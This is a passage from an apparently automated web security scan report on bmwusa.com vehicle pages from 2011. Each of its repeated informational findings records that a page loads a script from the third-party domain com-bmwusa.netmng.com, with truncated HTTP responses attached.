Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:31:09 GMT;path=/
Content-Length: 227711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.178. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740lisedan/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:10:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:32 GMT;path=/
Content-Length: 227712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.179. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:10:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:09 GMT;path=/
Content-Length: 215455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.180. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/740lisedan/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:10:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:30:08 GMT;path=/
Content-Length: 215456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.181. http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/7seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750isedan/7seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:14:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:33 GMT;path=/
Content-Length: 202156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.182. http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750isedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:12:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:32:03 GMT;path=/
Content-Length: 212689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.183. http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750isedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:14:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:37 GMT;path=/
Content-Length: 228030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.184. http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750isedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:14:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:30 GMT;path=/
Content-Length: 215521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.185. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/7seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750ixdrivesedan/7seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:17:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:37:28 GMT;path=/
Content-Length: 202243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.186. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:17:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:37:48 GMT;path=/
Content-Length: 212632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.187. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:14:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:34:54 GMT;path=/
Content-Length: 212633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.188. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:17:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:37:26 GMT;path=/
Content-Length: 228916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.189. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750ixdrivesedan/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:16:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:36:56 GMT;path=/
Content-Length: 228917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.190. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:15:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:35:41 GMT;path=/
Content-Length: 217827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.191. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750ixdrivesedan/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:15:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:35:21 GMT;path=/
Content-Length: 217828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.192. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/7seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lisedan/7seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:18:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:38:04 GMT;path=/
Content-Length: 202313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.193. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lisedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:18:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:38:20 GMT;path=/
Content-Length: 212884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.194. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lisedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:19:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:39:18 GMT;path=/
Content-Length: 228584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.195. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lisedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:19:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:39:15 GMT;path=/
Content-Length: 215840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.196. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/7seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lixdrivesedan/7seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:21 GMT;path=/
Content-Length: 202223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.197. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:23:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:43:04 GMT;path=/
Content-Length: 212740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.198. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:19:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:39:41 GMT;path=/
Content-Length: 212741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.199. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:53 GMT;path=/
Content-Length: 228844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.200. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:37 GMT;path=/
Content-Length: 228845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.201. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:25 GMT;path=/
Content-Length: 216305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.202. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:11 GMT;path=/
Content-Length: 216306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.203. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/7seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/760lisedan/7seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:25:08 GMT
Connection: close
